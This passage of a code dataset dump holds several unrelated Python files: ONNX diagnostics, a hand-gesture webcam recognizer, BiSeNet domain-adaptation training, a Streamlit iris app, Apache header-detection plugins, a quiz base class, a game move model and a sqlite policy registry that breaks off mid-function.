\"\"\"Adds a diagnostic to the context.\n\n Use this method to add diagnostics that are not created by the context.\n Args:\n diagnostic: The diagnostic to add.\n \"\"\"\n if not isinstance(diagnostic, self.diagnostic_type):\n raise TypeError(\n f\"Expected diagnostic of type {self.diagnostic_type}, got {type(diagnostic)}\"\n )\n self.diagnostics.append(diagnostic)\n\n def diagnose(\n self,\n rule: Rule,\n level: Level,\n message: Optional[str] = None,\n **kwargs,\n ) -> Diagnostic:\n \"\"\"Creates a diagnostic for the given arguments.\n\n Args:\n rule: The rule that triggered the diagnostic.\n level: The level of the diagnostic.\n message: The message of the diagnostic.\n **kwargs: Additional arguments to pass to the Diagnostic constructor.\n\n Returns:\n The created diagnostic.\n\n Raises:\n ValueError: If the rule is not supported by the tool.\n \"\"\"\n diagnostic = self.diagnostic_type(rule, level, 
message, **kwargs)\n self.add_diagnostic(diagnostic)\n return diagnostic\n\n def pretty_print(\n self, verbose: bool = False, log_level: Level = Level.ERROR\n ) -> None:\n \"\"\"Prints the diagnostics in a human-readable format.\n\n Args:\n verbose: Whether to print the diagnostics in verbose mode. See Diagnostic.pretty_print.\n level: The minimum level of diagnostics to print.\n \"\"\"\n formatter.pretty_print_title(\n f\"Diagnostic Run {self.name} version {self.version}\"\n )\n print(f\"verbose: {verbose}, log level: {log_level}\")\n diagnostic_stats = {level: 0 for level in Level}\n for diagnostic in self.diagnostics:\n diagnostic_stats[diagnostic.level] += 1\n formatter.pretty_print_title(\n \" \".join(f\"{diagnostic_stats[level]} {level.name}\" for level in Level)\n )\n\n for diagnostic in self.diagnostics:\n diagnostic.pretty_print(verbose, log_level)\n\n unprinted_diagnostic_stats = [\n (level, count)\n for level, count in diagnostic_stats.items()\n if count > 0 and level.value < log_level.value\n ]\n if unprinted_diagnostic_stats:\n print(\n f\"{' '.join(f'{count} {level.name}' for level, count in unprinted_diagnostic_stats)} \"\n \"were not printed due to the log level.\"\n )\n print()\n","repo_name":"robit-man/AGX-ORIN-TORCH-PACKAGES","sub_path":"site-packages/torch/onnx/_internal/diagnostics/infra/_infra.py","file_name":"_infra.py","file_ext":"py","file_size_in_byte":15496,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"28184457145","text":"from tensorflow.keras.applications.mobilenet_v2 import preprocess_input\nfrom tensorflow.keras.models import load_model\nimport cv2 as cv\nimport numpy as np\nimport os\n\n# Read the Haar-Cascade training data for face detection and create a CascadeClassifier object\ncascade = cv.CascadeClassifier(cv.samples.findFile(\"haarcascade_frontalface_alt.xml\")) # Haar-Cascade training data for frontal human faces\n\n# Load the model that recognizes fingers\nmodel = load_model('hand_detect_model2.h5')\n\n# Create a VideoCapture object\ncap = cv.VideoCapture(0)\n\n# Capture the live incoming video frame by frame and display it on screen\nwhile True:\n\n # read one frame of the playing video\n ret, img = cap.read()\n # ret is True if the video frame was read correctly and False if reading failed\n if ret == False:\n break\n\n img_result = img.copy()\n # convert the image to grayscale\n gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n # apply Histogram Equalization to improve the image's contrast\n gray = cv.equalizeHist(gray)\n\n # return the face positions as a list (x, y, w, h) / (x, y): top-left corner of the face, (w, h): width and height\n rects = cascade.detectMultiScale(gray, scaleFactor=1.1, minNeighbors=5, minSize=(30, 30),\n flags=cv.CASCADE_SCALE_IMAGE)\n\n # draw a black rectangle over the face region\n height, width = img.shape[:2]\n for x1, y1, x2, y2 in rects:\n cv.rectangle(img, (x1 - 10, 0), (x1+x2+10, height), (0, 0, 0), -1)\n\n # convert BGR -> HSV\n img_hsv = cv.cvtColor(img, cv.COLOR_BGR2HSV)\n\n # set the skin HSV range\n low = (0, 30, 0)\n high = (15, 255, 255)\n\n # convert the image to a binary image\n img_binary = cv.inRange(img_hsv, low, high)\n\n 
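# note: this HSV window (hue 0-15 out of OpenCV's 0-179 hue range, saturation >= 30) is a rough\n # heuristic for reddish skin tones; different lighting or skin tones may need it retuned\n\n 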
# find the boundary\n kernel = cv.getStructuringElement(cv.MORPH_ELLIPSE, (5, 5))\n img_binary = cv.morphologyEx(img_binary, cv.MORPH_CLOSE, kernel, 1)\n\n # find contours in the binary image\n contours, hierarchy = cv.findContours(img_binary, cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE)\n\n max_contour = None\n max_area = -1\n\n # select the contour with the largest area : hand detection\n for contour in contours:\n area = cv.contourArea(contour)\n x, y, w, h = cv.boundingRect(contour)\n if (w * h) * 0.4 > area:\n continue\n if w > h:\n continue\n if area > max_area:\n max_area = area\n max_contour = contour\n\n if max_area < 10000:\n max_area = -1\n\n # draw the detected contour\n cv.drawContours(img_result, [max_contour], 0, (255, 0, 0), 3)\n\n # find the position of the hand region\n contours_xy = np.array(max_contour)\n # find the min and max of x\n x_min, x_max = 0, 0\n value = list()\n for i in range(len(contours_xy)):\n value.append(contours_xy[i][0][0]) # the x value sits at index 0 of the innermost bracket\n x_min = min(value)\n x_max = max(value)\n # find the min and max of y\n y_min, y_max = 0, 0\n value = list()\n for i in range(len(contours_xy)):\n value.append(contours_xy[i][0][1]) # the y value sits at index 1 of the innermost bracket\n y_min = min(value)\n y_max = max(value)\n\n # crop just the hand region out of the frame\n x = x_min\n y = y_min\n w = x_max - x_min\n h = y_max - y_min\n img_trim = img[y_min-10:y_max+10, x_min-10:x_max+10]\n\n # predict the finger pose from the hand-region image using the finger detection model\n try:\n hand_input = cv.resize(img_trim, (128, 128))\n hand_input = np.expand_dims(hand_input, axis=0)\n hand_input = np.array(hand_input)\n cv.imshow(\"Result\", img_result)\n predictions = model.predict(hand_input)\n print(\"predict : \", np.argmax(predictions)) # show the frame with the contour drawn on the hand region\n #cv.imshow(\"Result\", img_trim) # show the image cropped to the hand region of the frame\n cv.waitKey(100)\n except:\n print(\"Could not recognize a hand.\")\n continue","repo_name":"LeeeJooo/FingerPOSErecognition","sub_path":"mainVideo2.py","file_name":"mainVideo2.py","file_ext":"py","file_size_in_byte":4152,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"22013379095","text":"import argparse\nfrom torch.utils.data import DataLoader\nimport torch.nn.functional as F\nimport os\nfrom model.build_BiSeNet import BiSeNet\nfrom torch.autograd import Variable\nimport torch.optim as optim\nimport torch\nfrom tensorboardX import SummaryWriter\nfrom tqdm import tqdm\nimport numpy as np\nfrom utils import poly_lr_scheduler, reverse_one_hot, compute_global_accuracy, fast_hist, per_class_iu\nimport torch.cuda.amp as amp\nfrom dataset.cityscapes_dataset import cityscapesDataSet\nfrom dataset.gta5_dataset import gta5DataSet\nfrom model.discriminator import FCDiscriminator\nfrom model.discriminator_dsc import DSCDiscriminator\nfrom utils import upload_model, best_model\nfrom arguments import get_args\n\ndef val(args, model, dataloader):\n print('start val!')\n \n with torch.no_grad():\n model.eval()\n precision_record = []\n hist = np.zeros((args.num_classes, args.num_classes))\n\n for i, (data,label,_,_) in enumerate(dataloader):\n \n label = label.type(torch.LongTensor)\n data = data.cuda()\n label = label.long().cuda()\n\n # get RGB predict image\n predict = model(data).squeeze()\n predict = reverse_one_hot(predict)\n predict = np.array(predict.cpu())\n\n # get RGB label image\n label = label.squeeze()\n if args.loss == 'dice':\n label = reverse_one_hot(label)\n label = np.array(label.cpu())\n\n # compute per pixel accuracy\n precision = compute_global_accuracy(predict, label)\n hist += fast_hist(label.flatten(), predict.flatten(), args.num_classes)\n\n # there is no need to transform the one-hot array to visual RGB array\n precision_record.append(precision)\n \n precision = np.mean(precision_record)\n miou_list = per_class_iu(hist)\n miou = np.mean(miou_list)\n print('precision per pixel for test: %.3f' % precision)\n print('mIoU for validation: %.3f' % miou)\n print(f'mIoU per class: {miou_list}')\n\n return precision, miou\n\n\ndef train(args, model, optimizer, dataloader_source, dataloader_target, dataloader_val, model_D, optimizer_D, IMG_MEAN, cropSize):\n writer = SummaryWriter(comment=''.format(args.optimizer, args.context_path))\n\n scaler = amp.GradScaler()\n discriminator_scaler = 
amp.GradScaler()\n # Loss\n bce_loss = torch.nn.BCEWithLogitsLoss()\n loss_func = torch.nn.CrossEntropyLoss(ignore_index=255)\n \n source_label = 0\n target_label = 1 \n max_miou = 0\n step = 0\n\n for epoch in range(args.num_epochs):\n\n \n lr = poly_lr_scheduler(optimizer, args.learning_rate, iter=epoch, max_iter=args.num_epochs, power = args.power) \n discriminator_lr = poly_lr_scheduler(optimizer_D, args.learning_rateD, iter=epoch, max_iter=args.num_epochs, power = args.power) \n \n \n model.train()\n model_D.train()\n\n total=len(dataloader_source) * args.batch_size\n tq = tqdm(total=total)\n tq.set_description('epoch %d, lr %f'% (epoch , lr))\n \n \n loss_record_source = []\n loss_record_target = []\n loss_D_record = []\n\n source_iter = enumerate(dataloader_source)\n target_iter = enumerate(dataloader_target)\n\n for batch_source, batch_target in zip(source_iter, target_iter):\n \n _, (data_source, label_source, _, _) = batch_source\n \n \n _, (data_target, label_target, _, _) = batch_target\n \n \n optimizer.zero_grad()\n optimizer_D.zero_grad()\n\n # Train Segmentation network\n for param in model_D.parameters():\n param.requires_grad = False\n\n # Train with source\n data_source = data_source.cuda()\n label_source = label_source.long().cuda()\n\n with amp.autocast():\n output, output_sup1, output_sup2 = model(data_source)\n loss1 = loss_func(output, label_source)\n loss2 = loss_func(output_sup1, label_source)\n loss3 = loss_func(output_sup2, label_source)\n loss_segmentation_source = loss1 + loss2 + loss3 #LOSS SEGMENTATION\n \n scaler.scale(loss_segmentation_source).backward()\n \n\n # Train with target\n data_target = data_target.cuda()\n\n if args.use_pseudolabels==1:\n label_target = label_target.long().cuda()\n\n with amp.autocast(): \n output_target, output_sup1_t, output_sup2_t = model(data_target)\n if args.use_pseudolabels==1:\n loss1_t = loss_func(output_target, label_target)\n loss2_t = loss_func(output_sup1_t, label_target)\n loss3_t = loss_func(output_sup2_t, label_target)\n loss_seg_target = loss1_t + loss2_t + loss3_t\n\n else:\n loss_seg_target = 0\n\n \n D_out=model_D(F.softmax(output_target, dim=1)) \n loss_adversarial = bce_loss(D_out, Variable(torch.FloatTensor(D_out.data.size()).fill_(source_label)).cuda()) \n loss_target = args.lambda_adv * loss_adversarial + loss_seg_target #LOSS ADVERSARIAL \n \n scaler.scale(loss_target).backward()\n \n\n # train D\n\n # bring back requires_grad\n for param in model_D.parameters():\n param.requires_grad = True\n\n # Train D with source\n with amp.autocast():\n output_source = output.detach()\n D_out = model_D(F.softmax(output_source, dim =1))\n loss_D_source = bce_loss(D_out, Variable(torch.FloatTensor(D_out.data.size()).fill_(source_label)).cuda())\n\n # Train D with target\n with amp.autocast():\n output_target = output_target.detach()\n D_out = model_D(F.softmax(output_target, dim=1))\n loss_D_target = bce_loss(D_out, Variable(torch.FloatTensor(D_out.data.size()).fill_(target_label)).cuda()) \n \n loss_D = loss_D_source/2 + loss_D_target/2\n\n discriminator_scaler.scale(loss_D).backward()\n\n discriminator_scaler.step(optimizer_D)\n scaler.step(optimizer)\n\n discriminator_scaler.update()\n scaler.update()\n\n\n tq.update(args.batch_size)\n \n\n tq.set_postfix(loss_segmentation_source='%.6f' % loss_segmentation_source, loss_target='%.6f' % loss_target, loss_D='%.6f' % loss_D)\n step += 1\n writer.add_scalar('loss_seg_source_step', loss_segmentation_source, step)\n writer.add_scalar('loss_target_step', loss_target, 
step)\n writer.add_scalar('loss_D_step', loss_D, step)\n \n loss_record_source.append(loss_segmentation_source.item())\n loss_record_target.append(loss_target.item())\n loss_D_record.append(loss_D.item())\n\n \n tq.close() \n loss_train_mean_source = np.mean(loss_record_source)\n writer.add_scalar('epoch/loss_epoch_train', float(loss_train_mean_source), epoch)\n print('loss for train source : %f' % (loss_train_mean_source))\n\n loss_train_mean_target = np.mean(loss_record_target)\n writer.add_scalar('epoch/loss_epoch_train', float(loss_train_mean_target), epoch)\n print('loss for train target : %f' % (loss_train_mean_target))\n\n loss_D_mean = np.mean(loss_D_record)\n writer.add_scalar('epoch/loss_', float(loss_D_mean), epoch)\n print('loss for discriminator : %f' % (loss_D_mean))\n\n if epoch % args.validation_step == 0 and epoch != 0:\n precision, miou = val(args, model, dataloader_val)\n if miou > max_miou:\n max_miou = miou\n import os \n os.makedirs(args.save_model_path, exist_ok=True)\n best_model(args, model, model_D, optimizer, optimizer_D, epoch, \"best_model\")\n \n writer.add_scalar('epoch/precision_val', precision, epoch)\n writer.add_scalar('epoch/miou val', miou, epoch)\n \n \n \n\ndef main(params):\n args, IMG_MEAN = get_args(params)\n\n # set up the crop sizes\n cropSize= (args.crop_width , args.crop_height)\n cropSizeGTA5 = (1280,720)\n \n # Create dataset train GTA \n dataset_train_source = gta5DataSet(args.source, args.path_source, crop_size=cropSizeGTA5)\n dataloader_source = DataLoader(dataset_train_source,\n batch_size=args.batch_size,\n shuffle=True,\n num_workers = args.num_workers)\n \n if args.use_pseudolabels == 1:\n args.checkpoint_name_save = args.checkpoint_name_save.replace(\".pth\", \"_ssl.pth\")\n \n\n if args.use_pseudolabels == 0:\n dataset_train_target = cityscapesDataSet(args.dataset, args.data_train, crop_size=cropSize)\n\n dataloader_target = DataLoader(dataset_train_target,\n batch_size=args.batch_size,\n shuffle=True,\n num_workers = args.num_workers\n )\n else: \n print('entered the pseudo-label branch for dataset_train_target')\n dataset_train_target = cityscapesDataSet(args.dataset, args.data_train, crop_size=cropSize, pseudo_path= args.pseudo_path, use_pseudolabels = 1, encodeseg= 0)\n \n dataloader_target = DataLoader(dataset_train_target,\n batch_size= args.batch_size,\n shuffle=True,\n num_workers = args.num_workers, \n )\n\n dataset_val = cityscapesDataSet(args.dataset, args.data_val, crop_size=cropSize, use_pseudolabels=0, encodeseg =1 )\n dataloader_val = DataLoader(dataset_val,\n batch_size= 1,\n shuffle=True,\n num_workers = args.num_workers, \n ) \n\n \n # build model\n os.environ['CUDA_VISIBLE_DEVICES'] = args.cuda\n model = BiSeNet(args.num_classes, args.context_path)\n \n if(args.Discriminator==0): \n print('entered the Discriminator 0 branch') \n model_D = FCDiscriminator(num_classes=args.num_classes)\n else: # use the lightweight one \n print('entered the Discriminator 1 branch')\n model_D= DSCDiscriminator(num_classes=args.num_classes) \n\n if torch.cuda.is_available() and args.use_gpu:\n model_D = torch.nn.DataParallel(model_D).cuda()\n model = torch.nn.DataParallel(model).cuda()\n \n \n \n # build optimizers\n \n optimizer_D = optim.Adam(model_D.parameters(), lr=args.learning_rateD, betas=(0.9, 0.99)) \n optimizer = torch.optim.SGD(model.parameters(), args.learning_rate, momentum=0.9, weight_decay=1e-4)\n \n\n \n if args.use_pretrained_model ==1 : \n model, model_D, optimizer, optimizer_D, epoch_start = upload_model(args, model, model_D, optimizer, optimizer_D) \n else:\n 
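# no pretrained checkpoint requested: run the full adversarial training loop from scratch\n 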
train(args, model, optimizer, dataloader_source, dataloader_target, dataloader_val, model_D, optimizer_D, IMG_MEAN, cropSize)\n \n \n val(args, model, dataloader_val)\n \nif __name__ == '__main__':\n params = [\n '--use_pseudolabels','0',\n '--save_dir_plabels', '/content/drive/MyDrive/dataset/pseudolabels',\n '--pseudo_path', './dataset/pseudolabels/labels',\n '--num_epochs', '50',\n '--learning_rate', '2.5e-4',\n '--data_train', './dataset/data/Cityscapes/train.txt',\n '--data_val', './dataset/data/Cityscapes/val.txt',\n '--num_workers', '4',\n '--num_classes', '19',\n '--cuda', '0',\n '--batch_size', '4',\n '--save_model_path', './checkpoints_101_sgd',\n '--context_path', 'resnet101', # set resnet18 or resnet101, only support resnet18 and resnet101\n '--optimizer', 'sgd',\n '--Discriminator', '1',\n '--use_pretrained_model','0',\n '--checkpoint_name_save','model_output.pth',\n '--checkpoint_name_load','model_output_best.pth'\n\n ]\n\n main(params)","repo_name":"micolrosini/Real-Time-Domain-Adaptation-in-Image-Segmentation","sub_path":"trainUnsupervised.py","file_name":"trainUnsupervised.py","file_ext":"py","file_size_in_byte":12357,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
{"seq_id":"38296554351","text":"from altair.vegalite.v4.schema.channels import X\r\nimport streamlit as st\r\n#importing necessary libraries\r\nfrom sklearn.datasets import load_iris\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.metrics import confusion_matrix\r\nimport seaborn as sb\r\n\r\nst.title(\"Iris Flower Predictor\")\r\nst.header(\"Enter Your Data: \")\r\n\r\ndef user_input():\r\n sepal_length =st.slider('Sepal Length',0.0,10.0,5.0)\r\n sepal_width = st.slider('Sepal Width',0.0,10.0,5.0)\r\n petal_length =st.slider('Petal Length',0.0,10.0,5.0)\r\n petal_width =st.slider('Petal Width',0.0,10.0,5.0)\r\n data = {\"Sepal Length\":sepal_length,\r\n \"Sepal Width\": sepal_width,\r\n \"Petal Length\": petal_length,\r\n \"Petal Width\": petal_width\r\n }\r\n features = pd.DataFrame(data, index=[0])\r\n return features\r\ndf = user_input()\r\n\r\n
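#note: st.slider's positional arguments above are (label, min, max, default),\r\n#so every feature slider starts at 5.0 on a 0-10 scale\r\n\r\n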
st.subheader(\"User Input\")\r\nst.write(df) \r\n\r\nflowers = load_iris()\r\nX = flowers.data\r\nY = flowers.target\r\nmodel = LogisticRegression()\r\nmodel.fit(X,Y)\r\npredicted_flower = model.predict(df)\r\npred_values = model.predict(X)\r\nscore = str(model.score(X,Y)*100)\r\n\r\n\r\nst.subheader(\"Predicted Flower:\")\r\nst.write(pd.DataFrame(flowers.target_names[predicted_flower]))\r\n\r\nst.subheader(\"Model Accuracy:\")\r\nst.write(score + \"%\")\r\n\r\n\r\nst.set_option('deprecation.showPyplotGlobalUse', False)\r\n\r\nst.subheader(\"Confusion Matrix:\")\r\ncm = confusion_matrix(Y,pred_values)\r\nsb.heatmap(cm,annot=True)\r\nplt.xlabel(\"Predicted\")\r\nplt.ylabel(\"True\")\r\nst.pyplot()\r\n\r\n","repo_name":"nilu-24/iris_predictor","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"42573172994","text":"from detectem.plugin import Plugin\n\n\nclass ApachePlugin(Plugin):\n name = 'apache'\n homepage = 'http://httpd.apache.org/'\n matchers = [\n {'header': ('Server', 'Apache/(?P<version>[0-9\\\.]+)')},\n ]\n\n\nclass ApacheCoyotePlugin(Plugin):\n name = 'apache-coyote'\n homepage = 'http://httpd.apache.org/'\n matchers = [\n {'header': ('Server', 'Apache-Coyote/(?P<version>[0-9\\\.]+)')},\n ]\n\n\nclass ApacheModbwlimitedPlugin(Plugin):\n name = 'apache-mod_bwlimited'\n homepage = 'http://cpanel.com/' # It comes with cpanel\n matchers = [\n {'header': ('Server', 'mod_bwlimited/(?P<version>[0-9\\\.]+)')},\n ]\n\n\nclass ApacheModfcgidPlugin(Plugin):\n name = 'apache-mod_fcgid'\n homepage = 'https://httpd.apache.org/mod_fcgid/'\n matchers = [\n {'header': ('Server', 'mod_fcgid/(?P<version>[0-9\\\.]+)')},\n ]\n","repo_name":"rtobar/detectem","sub_path":"detectem/plugins/infraestructure/apache.py","file_name":"apache.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"}
{"seq_id":"73636332267","text":"#!/usr/bin/env python2\n# -*- coding: UTF-8 -*-\n\"\"\"\n Complexity: quizzes/__init__.py\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n The core functions for working with quizzes.\n\n\"\"\"\n\nimport os\nimport uuid\nfrom pkgutil import iter_modules\n\nSHELVE_INSTANCE_PREFIX = 'quiz-'\n\n# Get the quizzes package's path.\nquizzes_path = os.path.dirname(__file__)\n\n# Find all quiz modules.\nquiz_modules = [\n module for _, module, _ in iter_modules([quizzes_path])\n]\n\n# Create name (replace '_' with spaces and make title case).\nquiz_names = [\n module.replace('_', ' ').title() for module in quiz_modules\n]\n\n# Generate dictionary of quizzes and their names.\nquizzes = {\n name: module\n for name, module in zip(quiz_names, quiz_modules)\n}\n\n# For reverse lookup.\nquizzes_rev = {v: k for k, v in quizzes.items()}\n\ndef load_quiz(quiz_module):\n \"\"\"\n Load Quiz class for given module.\n \n :param quiz_module: Name of module that contains `Quiz` class\n in the package `quizzes`.\n :type quiz_module: str\n\n :returns: The `Quiz` class from `quiz_module`.\n \"\"\"\n\n # TODO: When additional modules exist, load dynamically based on\n # `quiz_module`.\n from the_modulus import Quiz\n\n return Quiz\n\n\nclass BaseQuiz(object):\n \"\"\"\n Base Quiz object that all Quiz objects MUST inherit from.\n \"\"\"\n def __init__(self):\n self.ended = False\n\n @classmethod\n def create_new(cls, shelve):\n \"\"\"\n Create new instance of `cls` and save in shelve.\n\n :param shelve: The open shelve (file) from flask-shelve.\n\n :returns: The Quiz instance's ID.\n \"\"\"\n return cls().save(shelve)\n\n @staticmethod\n def get_instance(shelve, id_):\n \"\"\"\n Get instance from the shelve file.\n\n :param shelve: The open shelve (file) from flask-shelve.\n :param id_: The Quiz instance's ID.\n\n :returns: Quiz instance.\n \"\"\"\n return shelve[SHELVE_INSTANCE_PREFIX + str(id_)]\n\n @classmethod\n def remove_instance(cls, shelve, id_):\n \"\"\"\n Remove instance from shelve file.\n\n :param shelve: The open shelve (file) from flask-shelve.\n :param id_: The Quiz instance's ID.\n \"\"\"\n cls.get_instance(shelve, id_).remove(shelve)\n\n def id(self, shelve):\n \"\"\"\n Find or create and claim ID for instance.\n\n :param shelve: The open shelve (file) from flask-shelve.\n\n :returns: The Quiz instance's ID.\n \"\"\"\n\n if hasattr(self, '_id'):\n return self._id\n \n new_id = str(uuid.uuid4())\n full_id = SHELVE_INSTANCE_PREFIX + new_id\n\n # If ID already used just generate another.\n if full_id in shelve:\n return self.id(shelve)\n\n # Claim the ID.\n shelve[full_id] = None\n \n # Save it for next time.\n self._id = new_id\n\n return new_id\n\n def save(self, shelve):\n \"\"\"\n Save instance to shelve file.\n\n :param shelve: The open shelve (file) from flask-shelve.\n\n 
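Overwrites any state previously saved under the same ID.\n\n 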
:returns: The Quiz instance's ID.\n \"\"\"\n id_ = self.id(shelve)\n shelve[SHELVE_INSTANCE_PREFIX + id_] = self\n return id_\n\n def remove(self, shelve):\n \"\"\"\n Remove instance from shelve file.\n\n :param shelve: The open shelve (file) from flask-shelve.\n \"\"\"\n id_ = self.id(shelve)\n del shelve[SHELVE_INSTANCE_PREFIX + id_]\n\n","repo_name":"stlukey/Complexity","sub_path":"complexity/quizzes/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3454,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"33687513888","text":"from typing import Dict, Union\nfrom werkzeug.exceptions import BadRequest\n\nCOLUMN = \"column\"\nPLAYER = \"player\"\nTYPE = \"type\"\nMOVE = \"MOVE\"\nMoveAsDict = Dict[str, Union[str, int]]\n\n\nclass Move:\n def __init__(self, player: str, type_: str, column: int = None):\n self._validate(column, player, type_)\n\n self.type = type_\n self.player = player\n self.column = column\n\n def as_dict(self) -> MoveAsDict:\n return {\n TYPE: self.type,\n PLAYER: self.player,\n COLUMN: self.column\n }\n\n def _validate(self, column: int, player: str, type_: str):\n if type_ == MOVE and type(column) != int:\n raise BadRequest(\"Move failed: missing or invalid 'column'\")\n","repo_name":"Zerryth/drop_token","sub_path":"models/move.py","file_name":"move.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17185767974","text":"import os\n\nfrom sqlalchemy import (\n create_engine,\n Table,\n Column,\n Integer,\n String,\n MetaData,\n UniqueConstraint\n)\nfrom sqlalchemy.orm import (\n sessionmaker,\n registry as registry_alch\n)\n\nfrom util.logging import log\nfrom util.paths import cache_dir\nfrom .registry import registry\nfrom .record_types import (\n samba_preg\n , samba_hkcu_preg\n , ad_shortcut\n , info_entry\n , printer_entry\n , drive_entry\n , folder_entry\n , envvar_entry\n , script_entry\n , file_entry\n , ini_entry\n , networkshare_entry\n)\n\nclass sqlite_registry(registry):\n def __init__(self, db_name, registry_cache_dir=None):\n self.db_name = db_name\n cdir = registry_cache_dir\n if cdir == None:\n cdir = cache_dir()\n self.db_path = os.path.join('sqlite:///{}/{}.sqlite'.format(cdir, self.db_name))\n self.db_cnt = create_engine(self.db_path, echo=False)\n self.__metadata = MetaData()\n self.__info = Table(\n 'info',\n self.__metadata,\n Column('id', Integer, primary_key=True),\n Column('name', String(65536), unique=True),\n Column('value', String(65536))\n )\n self.__hklm = Table(\n 'HKLM'\n , self.__metadata\n , Column('id', Integer, primary_key=True)\n , Column('hive_key', String(65536, collation='NOCASE'),\n unique=True)\n , Column('keyname', String(collation='NOCASE'))\n , Column('valuename', String(collation='NOCASE'))\n , Column('policy_name', String)\n , Column('type', Integer)\n , Column('data', String)\n )\n self.__hkcu = Table(\n 'HKCU'\n , self.__metadata\n , Column('id', Integer, primary_key=True)\n , Column('sid', String)\n , Column('hive_key', String(65536, collation='NOCASE'))\n , Column('keyname', String(collation='NOCASE'))\n , Column('valuename', String(collation='NOCASE'))\n , Column('policy_name', String)\n , Column('type', Integer)\n , Column('data', String)\n , UniqueConstraint('sid', 'hive_key')\n )\n self.__shortcuts = Table(\n 'Shortcuts'\n , self.__metadata\n , Column('id', Integer, primary_key=True)\n , Column('sid', String)\n , Column('path', 
String)\n , Column('policy_name', String)\n , Column('shortcut', String)\n , UniqueConstraint('sid', 'path')\n )\n self.__printers = Table(\n 'Printers'\n , self.__metadata\n , Column('id', Integer, primary_key=True)\n , Column('sid', String)\n , Column('name', String)\n , Column('policy_name', String)\n , Column('printer', String)\n , UniqueConstraint('sid', 'name')\n )\n self.__drives = Table(\n 'Drives'\n , self.__metadata\n , Column('id', Integer, primary_key=True)\n , Column('sid', String)\n , Column('login', String)\n , Column('password', String)\n , Column('dir', String)\n , Column('policy_name', String)\n , Column('path', String)\n , Column('action', String)\n , Column('thisDrive', String)\n , Column('allDrives', String)\n , Column('label', String)\n , Column('persistent', String)\n , Column('useLetter', String)\n , UniqueConstraint('sid', 'dir')\n )\n self.__folders = Table(\n 'Folders'\n , self.__metadata\n , Column('id', Integer, primary_key=True)\n , Column('sid', String)\n , Column('path', String)\n , Column('policy_name', String)\n , Column('action', String)\n , Column('delete_folder', String)\n , Column('delete_sub_folders', String)\n , Column('delete_files', String)\n , UniqueConstraint('sid', 'path')\n )\n self.__envvars = Table(\n 'Envvars'\n , self.__metadata\n , Column('id', Integer, primary_key=True)\n , Column('sid', String)\n , Column('name', String)\n , Column('policy_name', String)\n , Column('action', String)\n , Column('value', String)\n , UniqueConstraint('sid', 'name')\n )\n self.__scripts = Table(\n 'Scripts'\n , self.__metadata\n , Column('id', Integer, primary_key=True)\n , Column('sid', String)\n , Column('policy_name', String)\n , Column('number', String)\n , Column('action', String)\n , Column('path', String)\n , Column('arg', String)\n , UniqueConstraint('sid', 'path', 'arg')\n )\n self.__files = Table(\n 'Files'\n , self.__metadata\n , Column('id', Integer, primary_key=True)\n , Column('sid', String)\n , Column('policy_name', String)\n , Column('action', String)\n , Column('fromPath', String)\n , Column('targetPath', String)\n , Column('readOnly', String)\n , Column('archive', String)\n , Column('hidden', String)\n , Column('suppress', String)\n , Column('executable', String)\n , UniqueConstraint('sid', 'policy_name', 'targetPath', 'fromPath')\n )\n self.__ini = Table(\n 'Ini'\n , self.__metadata\n , Column('id', Integer, primary_key=True)\n , Column('sid', String)\n , Column('policy_name', String)\n , Column('action', String)\n , Column('path', String)\n , Column('section', String)\n , Column('property', String)\n , Column('value', String)\n , UniqueConstraint('sid', 'action', 'path', 'section', 'property', 'value')\n )\n self.__networkshare = Table(\n 'Networkshare'\n , self.__metadata\n , Column('id', Integer, primary_key=True)\n , Column('sid', String)\n , Column('policy_name', String)\n , Column('name', String)\n , Column('action', String)\n , Column('path', String)\n , Column('allRegular', String)\n , Column('comment', String)\n , Column('limitUsers', String)\n , Column('abe', String)\n , UniqueConstraint('sid', 'name', 'path')\n )\n\n self.__metadata.create_all(self.db_cnt)\n Session = sessionmaker(bind=self.db_cnt)\n self.db_session = Session()\n mapper_reg = registry_alch()\n try:\n mapper_reg.map_imperatively(info_entry, self.__info)\n mapper_reg.map_imperatively(samba_preg, self.__hklm)\n mapper_reg.map_imperatively(samba_hkcu_preg, self.__hkcu)\n mapper_reg.map_imperatively(ad_shortcut, self.__shortcuts)\n 
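# each map_imperatively call binds one plain record class to its table; this is SQLAlchemy's imperative (classical) mapping, which keeps the record classes free of ORM base classes\n 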
mapper_reg.map_imperatively(printer_entry, self.__printers)\n mapper_reg.map_imperatively(drive_entry, self.__drives)\n mapper_reg.map_imperatively(folder_entry, self.__folders)\n mapper_reg.map_imperatively(envvar_entry, self.__envvars)\n mapper_reg.map_imperatively(script_entry, self.__scripts)\n mapper_reg.map_imperatively(file_entry, self.__files)\n mapper_reg.map_imperatively(ini_entry, self.__ini)\n mapper_reg.map_imperatively(networkshare_entry, self.__networkshare)\n except:\n pass\n #logging.error('Error creating mapper')\n\n def _add(self, row):\n try:\n self.db_session.add(row)\n self.db_session.commit()\n except Exception as exc:\n self.db_session.rollback()\n raise exc\n\n def _info_upsert(self, row):\n try:\n self._add(row)\n except:\n (self\n .db_session.query(info_entry)\n .filter(info_entry.name == row.name)\n .update(row.update_fields()))\n self.db_session.commit()\n\n def _hklm_upsert(self, row):\n try:\n self._add(row)\n except:\n (self\n .db_session\n .query(samba_preg)\n .filter(samba_preg.hive_key == row.hive_key)\n .update(row.update_fields()))\n self.db_session.commit()\n\n def _hkcu_upsert(self, row):\n try:\n 